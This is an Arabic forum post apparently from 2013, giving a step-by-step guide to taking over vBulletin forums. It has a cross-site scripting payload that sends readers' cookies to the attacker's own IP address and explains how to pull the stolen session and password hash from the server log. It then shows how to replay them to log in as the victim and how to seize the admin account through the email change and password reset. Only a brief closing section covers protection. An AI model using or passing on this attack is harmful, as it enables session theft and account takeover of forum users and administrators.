منتدى الطيب

مرحب بكم

ابحث

الدخول السريع

ديسمبر 2016

الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
   1234
567891011
12131415161718
19202122232425
262728293031 

اليومية اليومية


    اختراق منتديات Vb >>> طريقه سهله جداااا ولاتحتاج خبرات ..

    شاطر

    admin
    المدير
    المدير

    عدد المساهمات : 141
    تاريخ التسجيل : 25/01/2010
    العمر : 19
    الموقع : http://altaiyb.ahlamontada.com/

    شرح اختراق منتديات Vb >>> طريقه سهله جداااا ولاتحتاج خبرات ..

    مُساهمة من طرف admin في الثلاثاء يونيو 18, 2013 3:33 am

    الآن إخترق المنتديات من اي نوع يدعم html
    يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..
    الطريقة كانت حكرا على عدد قليل جدا من الهاكرز العرب ..
    وانا الان اضع امامكم الطريقة من A - Z .. لكن بشرط واحد .. (أقرأ السطور التالية)
    " أقسم بالله العظيم أني لن استخدمها ضد إخواني المسلمين مهما كانت الأسباب والدوافع والله على ما أقول شهيد "
    فقط هذا ما أريده بالمقابل .. واعتقد انه طلب سهل يستطيع الجميع تنفيذه ...
    الموضوع : اختراق الـ vBulletin
    المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
    المستوى : متوسط
    تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
    بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..
    قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
    document.write('src="http://my_ip_address/'+document.(@)(@)(@)(@)(@)(@)+'">';
    مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .
    وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
    من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
    الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .
    وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
    مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
    ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ
    ابحث عن الكود الخاص بالباسورد .. مثال :
    GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
    ddf90622;%20sessionhash=a
    4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
    20]=1012444064;%20bblastvi
    sit=1011983161
    فكر قليلا الان .. اين الباسورد ؟؟
    الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
    قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
    http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
    ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
    في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
    لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
    وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..
    اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !
    ------------
    الحل
    -----------
    للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
    (واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )
    كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة فاذا وضعت او او
    اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .


    هذه احد الطرق انتا بس عليك انك تطبق
    document.write('img="http://192.168.1.110/'+document.(@)(@)(@)(@)(@)(@)+'">';




      الوقت/التاريخ الآن هو السبت ديسمبر 10, 2016 3:18 pm